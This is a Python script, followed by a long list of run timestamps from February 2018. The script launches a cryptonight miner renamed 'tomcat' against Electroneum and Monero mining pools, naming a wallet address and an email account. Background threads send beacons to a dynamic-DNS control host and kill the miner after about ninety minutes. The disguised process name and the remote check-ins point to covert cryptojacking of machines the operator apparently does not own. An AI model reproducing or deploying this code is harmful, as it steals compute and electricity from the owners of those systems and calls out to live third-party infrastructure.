import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:10:03.995583
#2018-02-17 15:57:07.056606
#2018-02-17 17:46:01.519739
#2018-02-17 19:35:04.757051
#2018-02-17 21:24:07.750399
#2018-02-17 23:08:05.280652
#2018-02-18 00:55:03.774151
#2018-02-18 02:43:06.774149
#2018-02-18 04:32:03.708482
#2018-02-18 06:23:06.754964
#2018-02-18 08:11:07.708025
#2018-02-18 09:58:02.222922
#2018-02-18 11:45:05.997267
#2018-02-18 13:31:04.488530
#2018-02-18 15:21:07.663763
#2018-02-18 17:10:02.786391
#2018-02-18 18:58:02.047384
#2018-02-18 20:45:04.212741
#2018-02-18 22:31:07.543919
#2018-02-19 00:19:03.720703
#2018-02-19 02:05:07.761650
#2018-02-19 03:53:04.986492
#2018-02-19 05:39:03.938714
#2018-02-19 07:27:04.104305
#2018-02-19 09:17:05.002564
#2018-02-19 11:07:02.005097
#2018-02-19 12:54:08.047743
#2018-02-19 14:41:01.333224
#2018-02-19 16:31:09.002375
#2018-02-19 18:17:04.556415
#2018-02-19 20:04:04.371751
#2018-02-19 21:52:07.155619
#2018-02-19 23:40:01.527221
#2018-02-20 01:26:06.093052
#2018-02-20 03:15:01.565061
#2018-02-20 05:01:06.807657
#2018-02-20 06:43:07.906600
#2018-02-20 08:29:02.103224
#2018-02-20 10:14:05.420437
#2018-02-20 11:59:01.655889
#2018-02-20 13:46:14.032780
#2018-02-20 15:32:06.345740
#2018-02-20 17:17:07.870533
#2018-02-20 19:08:01.470181
#2018-02-20 20:55:07.930572
#2018-02-20 22:40:08.171318
#2018-02-21 00:24:08.120605
#2018-02-21 02:09:07.983231
#2018-02-21 03:56:02.030837
#2018-02-21 05:43:05.934068
#2018-02-21 07:32:06.241874
#2018-02-21 09:16:07.456766
#2018-02-21 11:05:09.687123
#2018-02-21 12:53:04.796551
#2018-02-21 14:40:08.337804
#2018-02-21 16:26:10.604545
#2018-02-21 18:16:07.289918
#2018-02-21 20:01:10.815719
#2018-02-21 21:48:01.423573
#2018-02-21 23:38:06.775467
#2018-02-22 01:27:06.819786
#2018-02-22 03:15:09.957758
#2018-02-22 05:03:05.605253
#2018-02-22 06:46:05.560803
#2018-02-22 08:33:05.789587
#2018-02-22 10:20:09.787045
#2018-02-22 12:07:01.453972
#2018-02-22 13:52:06.617913
#2018-02-22 15:41:07.199500
#2018-02-22 17:28:08.689515
#2018-02-22 19:17:08.768835
#2018-02-22 21:10:03.891681
#2018-02-22 22:54:07.798622
#2018-02-23 00:42:09.130938
#2018-02-23 02:28:05.831845
#2018-02-23 04:17:05.992514
#2018-02-23 06:02:05.011524
#2018-02-23 07:49:01.822442
#2018-02-23 09:52:04.555989
#2018-02-23 11:56:05.939305
#2018-02-23 13:46:08.910249
#2018-02-23 15:33:09.298977
#2018-02-23 17:23:06.341655
#2018-02-23 19:11:03.895525
#2018-02-23 20:55:08.881194
#2018-02-23 22:43:07.826738
#2018-02-24 00:31:08.145732
#2018-02-24 02:22:04.394275
#2018-02-24 04:11:01.362202
#2018-02-24 05:59:03.384691
#2018-02-24 07:48:03.592677
#2018-02-24 09:32:05.922160
#2018-02-24 11:25:04.118352
#2018-02-24 13:14:03.417596
#2018-02-24 15:04:06.326508
#2018-02-24 16:54:05.016502
#2018-02-24 18:42:06.592695
#2018-02-24 20:31:05.142262
#2018-02-24 22:29:07.380409
#2018-02-25 01:39:05.579336
#2018-02-25 04:29:06.385096
#2018-02-25 07:23:07.517758
#2018-02-25 11:40:07.013145
#2018-02-25 14:08:01.742490
#2018-02-25 15:43:01.878906